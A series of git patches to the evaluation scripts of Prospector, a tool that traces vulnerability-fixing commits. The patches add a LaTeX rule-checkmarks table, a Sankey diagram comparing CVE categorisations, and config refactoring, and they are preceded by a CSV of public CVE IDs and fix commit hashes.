-CVE-2020-8134;https://github.com/TryGhost/Ghost;None:None;False;47739396705519a36018686894d1373e9eb92216,a98579c2ef52e09349ee08f36a2a3e2e3670568a; -CVE-2020-8840;https://github.com/FasterXML/jackson-databind;None:None;False;9bb52c7122271df75435ec7e66ecf6b02b1ee14f,914e7c9f2cb8ce66724bf26a72adc7e958992497; -CVE-2020-8945;https://github.com/proglottis/gpgme;None:None;False;92153bcb59bd2f511e502262c46c7bd660e21733,d43d199046c30db9bef90de20c09843bb8b45737,d575e5df6a8359a0ad12f59a8377d362c3eb6afd,7e8c79da5ec1bd810f01f46df83a8a914e49f4fa; -CVE-2020-9281;https://github.com/ckeditor/ckeditor4;None:None;False;0e15fa67271bd2e8b165c48368968f2e908860d7; -CVE-2020-9283;https://github.com/golang/crypto;None:None;False;bac4c82f69751a6dd76e702d54b3ceb88adab236; -CVE-2020-9402;https://github.com/django/django;None:None;False;fe886a3b58a93cfbe8864b485f93cb6d426cd1f2,02d97f3c9a88adc890047996e5606180bd1c6166,26a5cf834526e291db00385dd33d319b8271fc4c,6695d29b1c1ce979725816295a26ecc64ae0e927; -CVE-2020-9546;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-9547;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-9548;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-10236;https://github.com/Froxlor/Froxlor;None:None;False;6b09720ef8a1cc008751dd0ca0140a0597fedce5; -CVE-2020-10591;https://github.com/walmartlabs/concord;None:None;False;ab32c17f85200545ed6376badc528c7df95f5adb; -CVE-2020-10594;https://github.com/Styria-Digital/django-rest-framework-jwt;None:None;False;bea6d8f4099e4794c2b74a97ff85bd0401514313,868b5c22ddad59772b447080183e7c7101bb18e0; -CVE-2020-10672;https://github.com/FasterXML/jackson-databind;None:None;False;592872f4235c7f2a3280725278da55544032f72d; -CVE-2020-10673;https://github.com/FasterXML/jackson-databind;None:None;False;1645efbd392989cf015f459a91c999e59c921b15; \ No newline at end of file From 36d1ac7e60a9b89391949e049faea23e6aac33f2 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 19 Aug 2024 16:07:21 +0000 Subject: [PATCH 112/130] [IMP] removes unused code --- prospector/evaluation/analyse.py | 48 -------------------------------- 1 file changed, 48 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 368bf1c55..989bb283f 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -447,55 +447,7 @@ def _compare_keywords(keyws1, keyws2): return set(keyws1) != set(keyws2) -def _get_symmetric_difference(list1: list, list2: list, ignore: list): - """Returns two lists: the first containing elements that are only in list1 - but not in list2 and the second one vice versa. - """ - return list(set(list1) - set(list2) - set(ignore)), list( - set(list2) - set(list1) - set(ignore) - ) - - def _compare_commits(commits1, commits2): # Check if the two lists of commits contain the same elements, but possibly in different order return sorted(commits1) == sorted(commits2) and commits1 != commits2 - -def difference_ground_truth_datasets(): - """To find out if two ground truth datasets contain the same CVEs.""" - filepath1 = "evaluation/data/input/d63.csv" - filepath2 = "evaluation/data/input/d63_mvi.csv" - - dataset1 = load_dataset(filepath1) - dataset2 = load_dataset(filepath2) - - ids_dataset1 = set(record[0] for record in dataset1) - ids_dataset2 = set(record[0] for record in dataset2) - - unique_to_file1 = ids_dataset1 - ids_dataset2 - unique_to_file2 = ids_dataset2 - ids_dataset1 - - print(f"IDs in {filepath1} but not in {filepath2}:") - for id in sorted(unique_to_file1): - print(id) - - print(f"\nIDs in {filepath2} but not in {filepath1}:") - for id in sorted(unique_to_file2): - print(id) - - # Find differences in fixing commits - different_fixing_commits = [] - - ids_and_fixing1 = {} - for record in dataset1: - ids_and_fixing1[record[0]] = record[4] - - ids_and_fixing2 = {} - for record in dataset2: - ids_and_fixing2[record[0]] = record[4] - - for k, v in ids_and_fixing1.items(): - if v != ids_and_fixing2.get(k, ""): - different_fixing_commits.append((k, v)) - - print(f"\nDifferent fixing commits: {len(different_fixing_commits)}") From 45e449ba7aa9d64209766ec9ec368e6926f5ac00 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 20 Aug 2024 07:18:45 +0000 Subject: [PATCH 113/130] [ADD] function to produce checkmarks table as in D6.3 --- prospector/evaluation/analyse.py | 138 ++++++++++++++++++++++++++++++- prospector/evaluation/main.py | 11 ++- 2 files changed, 147 insertions(+), 2 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 989bb283f..202f35cc0 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -191,7 +191,6 @@ def _analyse_report( results[strong_matched_rule].append(cve_id) return - if i <= 0 and candidates_in_fixing_commits: # check for weak rules weak_matched_rules = set(matched_rules).intersection(WEAK_RULES) @@ -451,3 +450,140 @@ def _compare_commits(commits1, commits2): # Check if the two lists of commits contain the same elements, but possibly in different order return sorted(commits1) == sorted(commits2) and commits1 != commits2 + +def generate_checkmarks_table(input_dataset: str, selected_cves): + """ + Generates a table containing matched rules for each fixing commit in the generated reports. The table also contains the total overall execution time and the total LLM execution time. + + Args: + json_folder (str): The path to the folder containing the JSON reports. + output_file (str): The path to the output LaTeX file. + + Returns: + None + """ + # Define the list of all rules + all_rules = [ + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "COMMIT_IN_REFERENCE", + "COMMIT_IS_SECURITY_RELEVANT", + "VULN_ID_IN_LINKED_ISSUE", + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", + ] + + # Start the LaTeX table + latex_column_titles = [rule.replace("_", "\\_") for rule in all_rules] + latex_content = ( + """\\begin{longtabu} to \\textwidth { c | """ + + " | ".join(["c" for _ in all_rules]) + + """ | c | c } +\\caption{Matched rules for each fixing commit}\\\\ + \\toprule + & """ + + " & ".join([f"\\rot{{{rule}}}" for rule in latex_column_titles]) + + """ & \\rot{Total Execution Time} & \\rot{LLM Execution Time} \\\\ \\midrule + """ + ) + + # Go through every CVE-ID + fixing commit pair in the input dataset: + file = INPUT_DATA_PATH + input_dataset + ".csv" + dataset = load_dataset(file) + + if len(selected_cves) != 0: + dataset = [c for c in dataset if c[0] in selected_cves] + + for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): + cve_id = record[0] + fixing_commits = record[4].split(",") + + # Open the report file, and get + # - the fixing candidate's matched rules + # - the overall execution time + # - the sum of the LLM execution times + try: + with open(f"{PROSPECTOR_REPORTS_PATH_HOST}/{cve_id}.json") as file: + report = json.load(file) + + except FileNotFoundError: + logger.debug(f"Couldn't find report for {cve_id}") + continue + + except Exception as e: + logger.info(f"Error occured for {cve_id}: {e}") + continue + + matched_rules = [] + # filter commits and calculate their total relevance + relevant_commits = [ + { + "commit_id": commit["commit_id"], + "total_relevance": _calculate_total_relevance(commit), + "matched_rules": commit["matched_rules"], + } + for commit in report["commits"] + if commit["commit_id"] in fixing_commits + ] + + if relevant_commits: + fixing_candidate = max( + relevant_commits, key=lambda x: x["total_relevance"] + ) + + matched_rules = [ + rule["id"] for rule in fixing_candidate.get("matched_rules") + ] + + else: + # Don't save? + print(f"Did not add {cve_id}.json to the table.") + continue + + overall_exectime = round( + report["processing_statistics"]["core"]["execution time"][0], 2 + ) + llm_exectime = round( + sum( + report["processing_statistics"]["LLM"]["commit_classification"][ + "execution time" + ] + ), + 2, + ) + + # Initialise a row with the CVE ID + row = [cve_id] + + rule_checks = {rule: "" for rule in all_rules} + for r in matched_rules: + rule_checks[r] = "\checkmark" + + row.extend([rule_checks[r] for r in all_rules]) + row.extend([str(overall_exectime), str(llm_exectime)]) + + # Add the row to the latex content + latex_content += " & ".join(row) + "\\\\ \\midrule \n" + + # End latex table + latex_content += "\\bottomrule\n\\end{longtabu}" + + # Write the content to the output file + with open( + ANALYSIS_RESULTS_PATH + "summary_execution/checkmarks_table.tex", "w" + ) as file: + file.writelines(latex_content) + + +def _calculate_total_relevance(commit): + return sum(rule["relevance"] for rule in commit["matched_rules"]) diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 62daca433..8514c594e 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -8,7 +8,7 @@ analyse_category_flows, analyse_prospector_reports, count_existing_reports, - difference_ground_truth_datasets, + generate_checkmarks_table, ) from evaluation.analyse_statistics import ( analyse_statistics, @@ -96,6 +96,12 @@ def parse_cli_args(args): action="store_true", ) + parser.add_argument( + "-cm", + "--checkmarks", + action="store_true", + ) + return parser.parse_args() @@ -118,6 +124,9 @@ def main(argv): analyse_category_flows() # analyse_category_flows_no_mutual_exclusion() # analysis of Prospector reports + elif args.checkmarks: + generate_checkmarks_table(args.input, args.cve) + else: analyse_prospector_reports(args.input, args.cve) From b3c1103dfaaa7bbe549b553290884c74e656ed18 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 20 Aug 2024 07:26:29 +0000 Subject: [PATCH 114/130] [FIX] makes sure that version interval is only supplied when 'version_interval' is true in config --- prospector/evaluation/dispatch_jobs.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index f300c1be7..06ccec810 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -48,7 +48,9 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): _run_prospector_and_generate_report, kwargs={ "cve_id": cve[0], - "version_interval": cve[2], + "version_interval": ( + cve[2] if config.version_interval else "None:None" + ), "report_type": "json", "output_file": f"{PROSPECTOR_REPORTS_PATH_CONTAINER}{cve[0]}.json", "repository_url": cve[1], From 7f33fea60069c90aefd9b121c1f487c6648a950d Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 21 Aug 2024 08:18:08 +0000 Subject: [PATCH 115/130] [ADD] function to create sankey diagram with flows between categories --- prospector/evaluation/analyse.py | 177 +++++++++++++++++++++++++++++-- prospector/evaluation/main.py | 4 +- prospector/evaluation/utils.py | 64 ++++++++--- 3 files changed, 220 insertions(+), 25 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 202f35cc0..bff29c55a 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -3,6 +3,8 @@ import json import os from typing import List +import plotly.graph_objects as go +from plotly.io import write_image from tqdm import tqdm @@ -19,14 +21,22 @@ ) # The number of top commits to consider for 'high confidence' classification -NUM_TOP_COMMITS = 10 - +NUM_TOP_COMMITS = 1 + +# STRONG_RULES = [ +# "COMMIT_IN_REFERENCE", +# "VULN_ID_IN_MESSAGE", +# "XREF_BUG", +# "XREF_GH", +# "VULN_ID_IN_LINKED_ISSUE", +# "COMMIT_IS_SECURITY_RELEVANT", +# ] STRONG_RULES = [ "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", + "CVE_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", "COMMIT_IS_SECURITY_RELEVANT", ] @@ -62,13 +72,28 @@ def analyse_prospector_reports(filename: str, selected_cves: str): reports_not_found = [] #### Data to insert into table + # results = { + # "high": [], + # "COMMIT_IN_REFERENCE": [], + # "VULN_ID_IN_MESSAGE": [], + # "VULN_ID_IN_LINKED_ISSUE": [], + # "XREF_BUG": [], + # "XREF_GH": [], + # "COMMIT_IS_SECURITY_RELEVANT": [], + # "medium": [], + # "low": [], + # "not_found": [], + # "not_reported": [], + # "false_positive": [], + # "aborted": [], + # } results = { "high": [], "COMMIT_IN_REFERENCE": [], - "VULN_ID_IN_MESSAGE": [], - "VULN_ID_IN_LINKED_ISSUE": [], - "XREF_BUG": [], - "XREF_GH": [], + "CVE_ID_IN_MESSAGE": [], + "CVE_ID_IN_LINKED_ISSUE": [], + "CROSS_REFERENCED_JIRA_LINK": [], + "CROSS_REFERENCED_GH_LINK": [], "COMMIT_IS_SECURITY_RELEVANT": [], "medium": [], "low": [], @@ -587,3 +612,135 @@ def generate_checkmarks_table(input_dataset: str, selected_cves): def _calculate_total_relevance(commit): return sum(rule["relevance"] for rule in commit["matched_rules"]) + + +def generate_sankey_diagram(): + # Load JSON data + summary_execution_file = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + + ".json" + ) + summary_execution_comparison_file = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + COMPARISON_DIRECTORY.split("/")[-2] + + ".json" + ) + + summary1 = load_json_file(summary_execution_file) + summary2 = load_json_file(summary_execution_comparison_file) + print( + f"Comparing {summary_execution_file} with {summary_execution_comparison_file}" + ) + # Ignore sub categories of "high" + categories_to_include = [ + "high", + "medium", + "low", + "not_found", + "not_reported", + "false_positive", + "aborted", + "missing", + ] + # Extract results from both files + results1 = summary1["summary_execution_details"][-1]["results"] + results2 = summary2["summary_execution_details"][-1]["results"] + + # Filter results to include only specified categories + results1 = {k: v for k, v in results1.items() if k in categories_to_include} + results2 = {k: v for k, v in results2.items() if k in categories_to_include} + + # Create a mapping of CVEs to their categories for both files + cve_categories1 = { + cve: category for category, cves in results1.items() for cve in cves + } + cve_categories2 = { + cve: category for category, cves in results2.items() for cve in cves + } + + # Get all unique CVEs and categories + all_cves = set(cve_categories1.keys()) + + # Create node labels + node_labels = categories_to_include + categories_to_include + + # Create source, target, and value lists for Sankey diagram + source = [] + target = [] + value = [] + link_colours = [] + + # Count movements between categories + movements = defaultdict(int) + for cve in all_cves: + cat1 = cve_categories1.get(cve, None) + cat2 = cve_categories2.get(cve, None) + if not cat1 or not cat2: + continue + movements[(cat1, cat2)] += 1 + + # Assign colors to categories + category_colors = { + "high": "steelblue", + "medium": "dodgerblue", + "low": "cornflowerblue", + "not_found": "teal", + "not_reported": "cadetblue", + "false_positive": "lightgreen", + "aborted": "palegreen", + "missing": "gray", + } + + # Create node colors + node_colors = [category_colors[cat] for cat in categories_to_include] * 2 + # Convert movements to source, target, and value lists + category_to_index = {cat: i for i, cat in enumerate(categories_to_include)} + for (cat1, cat2), count in movements.items(): + source.append(category_to_index[cat1]) + target.append(category_to_index[cat2] + len(categories_to_include)) + value.append(count) + if cat1 == cat2: + link_colours.append("lightgray") + else: + link_colours.append(category_colors[cat1]) + + # Create the Sankey diagram + fig = go.Figure( + data=[ + go.Sankey( + node=dict( + pad=15, + thickness=20, + line=dict(color="black", width=0.5), + label=node_labels, + color=node_colors, + ), + link=dict( + source=source, + target=target, + value=value, + color=link_colours, + ), + ) + ] + ) + + filename1 = PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + filename2 = COMPARISON_DIRECTORY.split("/")[-2] + + fig.update_layout( + title_text=f"CVE Category Changes between {filename1} and {filename2}", + font_size=10, + width=1200, + height=800, + ) + + output_file = ( + ANALYSIS_RESULTS_PATH + "plots/" + f"sankey-{filename1}-{filename2}.png" + ) + # Save as PNG + write_image(fig, output_file) + print(f"Sankey diagram saved to {output_file}") diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 8514c594e..fe09f2ebb 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -9,6 +9,7 @@ analyse_prospector_reports, count_existing_reports, generate_checkmarks_table, + generate_sankey_diagram, ) from evaluation.analyse_statistics import ( analyse_statistics, @@ -139,7 +140,8 @@ def main(argv): count_existing_reports(args.input) elif not args.analyze and not args.execute and args.temporary: - difference_ground_truth_datasets() + # difference_ground_truth_datasets() + generate_sankey_diagram() # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index cb0996ed8..6b8413f9b 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,6 +1,5 @@ import csv import json -from typing import List from omegaconf import OmegaConf from log.logger import create_logger @@ -47,15 +46,35 @@ def update_summary_execution_table( The newly updated LaTeX table at `filepath`. """ # Combine the two Cross Reference rules into one count - results["XREF_BUG"] += results["XREF_GH"] - results.pop("XREF_GH") + # results["XREF_BUG"] += results["XREF_GH"] + # results.pop("XREF_GH") + results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] + results.pop("CROSS_REFERENCED_GH_LINK") table_data = [] for key, v in results.items(): - if type(v) == list: - v = len(v) + v = len(v) logger.info(f"\t{v}\t{key}") - table_data.append([v, round(v / total * 100, 2)]) + # if key in [ + # "COMMIT_IN_REFERENCE", + # "VULN_ID_IN_MESSAGE", + # "XREF_BUG", + # "XREF_GH", + # "VULN_ID_IN_LINKED_ISSUE", + # "COMMIT_IS_SECURITY_RELEVANT", + # ]: + if key in [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "VULN_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", + ]: + total_high_confidence = len(results.get("high")) + table_data.append([v, round(v / total_high_confidence * 100, 2)]) + else: + table_data.append([v, round(v / total * 100, 2)]) # Choose which column to update: if config.use_comparison_reports: @@ -78,17 +97,27 @@ def update_summary_execution_table( # Update the corresponding columns based on the mode try: + # For every index and line to edit for i, line_number in enumerate(lines_to_edit): - row_parts = table_lines[line_number].split("&") + # split the row into parts/sections (at every &) + columns = table_lines[line_number].split("&") + # for every index and column in this line (each part is a column, since it's split at &) for j, col_index in enumerate(col_indices): - row_parts[col_index] = f" {table_data[i][j]} " + # make the text gray if it's the prior eval column + if config.use_comparison_reports: + columns[col_index] = ( + f"\\color{{gray}} {table_data[i][j]} " + ) + # else just regular black + else: + columns[col_index] = f" {table_data[i][j]} " # Preserve everything after the last column we're updating last_updated_col = max(col_indices) - end_part = " & ".join(row_parts[last_updated_col + 1 :]).strip() + end_part = " & ".join(columns[last_updated_col + 1 :]).strip() # Reconstruct the line, preserving formatting - updated_parts = row_parts[: last_updated_col + 1] + updated_parts = columns[: last_updated_col + 1] if end_part: updated_parts.append(end_part) table_lines[line_number] = " & ".join(updated_parts) @@ -109,7 +138,12 @@ def update_summary_execution_table( # Add the last row showing the total count last_row = table_lines[27] last_row_parts = last_row.split("&") - last_row_parts[col_indices[0]] = f" \\textbf{{{total}}} " + if config.use_comparison_reports: + last_row_parts[col_indices[0]] = ( + f"\\color{{gray}} \\textbf{{{total}}} " + ) + else: + last_row_parts[col_indices[0]] = f" \\textbf{{{total}}} " table_lines[27] = "&".join(last_row_parts) # Write the updated table back to the file @@ -124,14 +158,16 @@ def select_reports_path_host( ): """Select where to store generated reports, or where to find reports for analysis.""" - if use_comparison_reports: - return f"{config.reports_directory}old_code_reports/" - + if version_interval and use_comparison_reports: + return f"{config.reports_directory}mvi_old_code_reports/" + # return f"{config.reports_directory}matteo_reports/" if version_interval and not llm_support: return f"{config.reports_directory}mvi_without_llm_reports/" if version_interval and llm_support: return f"{config.reports_directory}mvi_with_llm_reports/" + if not version_interval and use_comparison_reports: + return f"{config.reports_directory}nvi_old_code_reports/" if not version_interval and not llm_support: return f"{config.reports_directory}nvi_without_llm_reports/" if not version_interval and llm_support: From 08d1d58ac1b83d938b32af67d786713bafd89261 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 21 Aug 2024 11:54:36 +0000 Subject: [PATCH 116/130] [FIX] changes the config parameter use_comparison to batch, which can either be regular, old_code or old_reports --- prospector/evaluation/analyse.py | 103 ++++++++++++++++--------------- prospector/evaluation/main.py | 4 +- prospector/evaluation/utils.py | 50 +++++++-------- 3 files changed, 78 insertions(+), 79 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index bff29c55a..031aa5271 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -18,27 +18,30 @@ INPUT_DATA_PATH, PROSPECTOR_REPORTS_PATH_HOST, ANALYSIS_RESULTS_PATH, + BATCH, ) # The number of top commits to consider for 'high confidence' classification -NUM_TOP_COMMITS = 1 - -# STRONG_RULES = [ -# "COMMIT_IN_REFERENCE", -# "VULN_ID_IN_MESSAGE", -# "XREF_BUG", -# "XREF_GH", -# "VULN_ID_IN_LINKED_ISSUE", -# "COMMIT_IS_SECURITY_RELEVANT", -# ] -STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", - "COMMIT_IS_SECURITY_RELEVANT", -] +NUM_TOP_COMMITS = 5 + +if BATCH in ["regular", "old_code"]: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", + ] +else: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", + ] WEAK_RULES = [ "CHANGES_RELEVANT_FILES", @@ -72,36 +75,38 @@ def analyse_prospector_reports(filename: str, selected_cves: str): reports_not_found = [] #### Data to insert into table - # results = { - # "high": [], - # "COMMIT_IN_REFERENCE": [], - # "VULN_ID_IN_MESSAGE": [], - # "VULN_ID_IN_LINKED_ISSUE": [], - # "XREF_BUG": [], - # "XREF_GH": [], - # "COMMIT_IS_SECURITY_RELEVANT": [], - # "medium": [], - # "low": [], - # "not_found": [], - # "not_reported": [], - # "false_positive": [], - # "aborted": [], - # } - results = { - "high": [], - "COMMIT_IN_REFERENCE": [], - "CVE_ID_IN_MESSAGE": [], - "CVE_ID_IN_LINKED_ISSUE": [], - "CROSS_REFERENCED_JIRA_LINK": [], - "CROSS_REFERENCED_GH_LINK": [], - "COMMIT_IS_SECURITY_RELEVANT": [], - "medium": [], - "low": [], - "not_found": [], - "not_reported": [], - "false_positive": [], - "aborted": [], - } + if BATCH in ["regular", "old_code"]: + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "VULN_ID_IN_MESSAGE": [], + "VULN_ID_IN_LINKED_ISSUE": [], + "XREF_BUG": [], + "XREF_GH": [], + "COMMIT_IS_SECURITY_RELEVANT": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + "aborted": [], + } + else: + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "CVE_ID_IN_MESSAGE": [], + "CVE_ID_IN_LINKED_ISSUE": [], + "CROSS_REFERENCED_JIRA_LINK": [], + "CROSS_REFERENCED_GH_LINK": [], + "COMMIT_IS_SECURITY_RELEVANT": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + "aborted": [], + } print(f"Analysing reports in {PROSPECTOR_REPORTS_PATH_HOST}") logger.info(f"Attempting to analyse {len(dataset)} CVEs.") @@ -216,7 +221,7 @@ def _analyse_report( results[strong_matched_rule].append(cve_id) return - if i <= 0 and candidates_in_fixing_commits: + if i <= NUM_TOP_COMMITS and candidates_in_fixing_commits: # check for weak rules weak_matched_rules = set(matched_rules).intersection(WEAK_RULES) if weak_matched_rules: diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index fe09f2ebb..481b45d53 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -141,7 +141,9 @@ def main(argv): elif not args.analyze and not args.execute and args.temporary: # difference_ground_truth_datasets() - generate_sankey_diagram() + # generate_sankey_diagram() + # candidates_execution_time(args.input) + overall_execution_time(args.input) # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 6b8413f9b..becdfe694 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -46,38 +46,28 @@ def update_summary_execution_table( The newly updated LaTeX table at `filepath`. """ # Combine the two Cross Reference rules into one count - # results["XREF_BUG"] += results["XREF_GH"] - # results.pop("XREF_GH") - results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] - results.pop("CROSS_REFERENCED_GH_LINK") + if config.batch in ["regular", "old_code"]: + results["XREF_BUG"] += results["XREF_GH"] + results.pop("XREF_GH") + else: + results["CROSS_REFERENCED_JIRA_LINK"] += results[ + "CROSS_REFERENCED_GH_LINK" + ] + results.pop("CROSS_REFERENCED_GH_LINK") table_data = [] - for key, v in results.items(): + for i, (key, v) in enumerate(results.items()): v = len(v) logger.info(f"\t{v}\t{key}") - # if key in [ - # "COMMIT_IN_REFERENCE", - # "VULN_ID_IN_MESSAGE", - # "XREF_BUG", - # "XREF_GH", - # "VULN_ID_IN_LINKED_ISSUE", - # "COMMIT_IS_SECURITY_RELEVANT", - # ]: - if key in [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "VULN_ID_IN_LINKED_ISSUE", - "COMMIT_IS_SECURITY_RELEVANT", - ]: + + if i > 0 and i < 5: total_high_confidence = len(results.get("high")) table_data.append([v, round(v / total_high_confidence * 100, 2)]) else: table_data.append([v, round(v / total * 100, 2)]) # Choose which column to update: - if config.use_comparison_reports: + if config.batch == "old_reports": filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" col_indices = [1, 2] @@ -104,7 +94,7 @@ def update_summary_execution_table( # for every index and column in this line (each part is a column, since it's split at &) for j, col_index in enumerate(col_indices): # make the text gray if it's the prior eval column - if config.use_comparison_reports: + if config.batch == "old_reports": columns[col_index] = ( f"\\color{{gray}} {table_data[i][j]} " ) @@ -138,7 +128,7 @@ def update_summary_execution_table( # Add the last row showing the total count last_row = table_lines[27] last_row_parts = last_row.split("&") - if config.use_comparison_reports: + if config.batch == "old_reports": last_row_parts[col_indices[0]] = ( f"\\color{{gray}} \\textbf{{{total}}} " ) @@ -154,19 +144,20 @@ def update_summary_execution_table( def select_reports_path_host( - version_interval: bool, llm_support: bool, use_comparison_reports: bool + version_interval: bool, llm_support: bool, batch: str ): """Select where to store generated reports, or where to find reports for analysis.""" - if version_interval and use_comparison_reports: + if version_interval and batch == "old_code": return f"{config.reports_directory}mvi_old_code_reports/" - # return f"{config.reports_directory}matteo_reports/" + if version_interval and batch == "old_reports": + return f"{config.reports_directory}matteo_reports/" if version_interval and not llm_support: return f"{config.reports_directory}mvi_without_llm_reports/" if version_interval and llm_support: return f"{config.reports_directory}mvi_with_llm_reports/" - if not version_interval and use_comparison_reports: + if not version_interval and batch == "old_code": return f"{config.reports_directory}nvi_old_code_reports/" if not version_interval and not llm_support: return f"{config.reports_directory}nvi_without_llm_reports/" @@ -177,8 +168,9 @@ def select_reports_path_host( INPUT_DATA_PATH = config.input_data_path # Select the folder depending whether LLMs are used or not PROSPECTOR_REPORTS_PATH_HOST = select_reports_path_host( - config.version_interval, config.llm_support, config.use_comparison_reports + config.version_interval, config.llm_support, config.batch ) +BATCH = config.batch PROSPECTOR_REPORTS_PATH_CONTAINER = "/app/evaluation/data/reports/" ANALYSIS_RESULTS_PATH = "evaluation/data/results/" # Comparison dirs From 638384227d75dd7013c224d80df21240665bb863 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 26 Aug 2024 15:20:30 +0000 Subject: [PATCH 117/130] [FIX] changes to using clearer config variables for batch selection --- prospector/claude.md | 150 +++++++++++++++++++++++ prospector/evaluation/analyse.py | 101 ++++++++++----- prospector/evaluation/config-sample.yaml | 44 ++++--- prospector/evaluation/main.py | 13 +- prospector/evaluation/utils.py | 22 ++-- 5 files changed, 263 insertions(+), 67 deletions(-) create mode 100644 prospector/claude.md diff --git a/prospector/claude.md b/prospector/claude.md new file mode 100644 index 000000000..7f92c7393 --- /dev/null +++ b/prospector/claude.md @@ -0,0 +1,150 @@ +Certainly! Here's the modified Python function that takes a third JSON file into consideration and creates a Sankey diagram with three levels: + +```python +def generate_sankey_diagram(output_file="sankey_diagram.png"): + # Load JSON data + summary_execution_file1 = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + PROSPECTOR_REPORTS_PATH_HOST.split("/")[-2] + + ".json" + ) + summary_execution_file2 = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + COMPARISON_DIRECTORY.split("/")[-2] + + ".json" + ) + summary_execution_file3 = ( + ANALYSIS_RESULTS_PATH + + "summary_execution/" + + THIRD_DIRECTORY.split("/")[-2] + + ".json" + ) + + summary1 = load_json_file(summary_execution_file1) + summary2 = load_json_file(summary_execution_file2) + summary3 = load_json_file(summary_execution_file3) + print( + f"Comparing {summary_execution_file1}, {summary_execution_file2}, and {summary_execution_file3}" + ) + # Ignore sub categories of "high" + categories_to_include = 